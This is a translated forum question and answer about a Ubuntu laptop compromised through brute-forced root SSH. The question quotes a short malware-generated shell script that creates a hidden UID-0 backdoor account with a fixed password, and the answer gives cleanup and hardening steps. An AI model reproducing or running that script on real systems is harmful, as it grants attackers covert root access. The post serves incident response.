GNU/Linux >> LINUX-Kenntnisse >  >> Ubuntu

Wie geht man mit Malware auf dem Laptop um?

Ich bin mir ziemlich sicher, dass mein Ubuntu 13.10-Laptop mit irgendeiner Art von Malware infiziert ist.

Hin und wieder finde ich einen Prozess /lib/sshd (im Besitz von root), der läuft und viel CPU verbraucht. Es ist nicht der sshd-Server, der /usr/sbin/sshd ausführt.

Die Binärdatei hat –wxrw-rwt-Berechtigungen und generiert und erzeugt Skripte im /lib-Verzeichnis. Eine neuere heißt 13959730401387633604 und macht Folgendes

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

Der gusr-Benutzer wurde von der Malware unabhängig erstellt, und dann hängt die chpasswd, während sie 100 % CPU verbraucht.

Bisher habe ich festgestellt, dass der Benutzer gusr zusätzlich zu Dateien in /etc/

hinzugefügt wurde 
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Es scheint, als hätte die Malware Kopien all dieser Dateien mit dem Suffix „-“ erstellt. Die vollständige Liste der /etc/-Dateien, die von root geändert wurden, ist hier verfügbar.

Außerdem wurde die Datei /etc/hosts in this.

geändert

Die /lib/sshd beginnt, indem sie sich am Ende der Datei /etc/init.d/rc.local hinzufügt!

Ich habe den Benutzer entfernt, die Dateien entfernt, den Baum der verarbeiteten Dateien gelöscht, meine Passwörter geändert und die öffentlichen SSH-Schlüssel entfernt.

Ich bin mir bewusst, dass ich im Grunde am Arsch bin, und ich werde höchstwahrscheinlich das gesamte System neu installieren. Da ich mich jedoch bei mehreren anderen Computern anmelde, wäre es gut, zumindest zu versuchen, es zu entfernen und herauszufinden, wie ich es bekommen habe. Wir freuen uns über Vorschläge, wie Sie dies angehen können.

Es scheint, als seien sie am 25. März per Brute-Force-Root-Login eingestiegen. Ich hatte keine Ahnung, dass root ssh in Ubuntu standardmäßig aktiviert ist. Ich habe es deaktiviert und denyhosts eingerichtet.

Der Login war von 59.188.247.236, anscheinend irgendwo in Hongkong.

Ich habe den Laptop von EmperorLinux bekommen, und sie haben den Root-Zugriff aktiviert. Wenn Sie eines davon haben und sshd ausführen, seien Sie vorsichtig.

Akzeptierte Antwort:

Holen Sie zuerst diese Maschine jetzt aus dem Netzwerk!

Zweitens, warum haben Sie das Root-Konto aktiviert? Sie sollten das Root-Konto wirklich nicht aktivieren, es sei denn, Sie haben einen sehr guten Grund dafür.

Drittens, ja, der einzige Weg, um sicherzustellen, dass Sie sauber sind, ist eine saubere Installation. Es wird auch empfohlen, dass Sie neu beginnen und nicht zu einem Backup zurückkehren, da Sie nie sicher sein können, wann alles begonnen hat.

Verwandte:Befehl zum Ermitteln der öffentlichen IP?

Ich schlage auch vor, dass Sie bei Ihrer nächsten Installation eine Firewall einrichten und alle eingehenden Verbindungen verweigern:

sudo ufw default deny incoming

und erlauben Sie dann ssh mit:

sudo ufw allow ssh

und aktivieren Sie NICHT das Root-Konto! Sicher Stellen Sie sicher, dass die Root-SSH-Anmeldung deaktiviert ist.


Ubuntu

  1. Linux – Wie finde ich den Treiber (Modul), der mit einem Gerät unter Linux verbunden ist?

  2. Wie synchronisiert man das Root-Gedit mit den Einstellungen des Benutzer-Gedits?

  3. Wie installiere ich den Drucker mit Ubuntu?

  4. So richten Sie passwortloses SSH mit RSA-Schlüsseln ein

  5. SSH - So fügen Sie den Befehl -t in die Datei ~/.ssh/config ein

So ändern Sie das Root-Passwort unter Ubuntu 20.04

So verwalten Sie Ubuntu Server mit SSH aus der Ferne

So ändern Sie das Root-Passwort in Ubuntu

Wie ändere ich das Root-Verzeichnis der primären Domain mit .htaccess?

So setzen Sie das Root-Passwort auf Ubuntu 22.04 zurück

Wie deaktiviere ich die SSH-Anmeldung für den Root-Benutzer in Linux?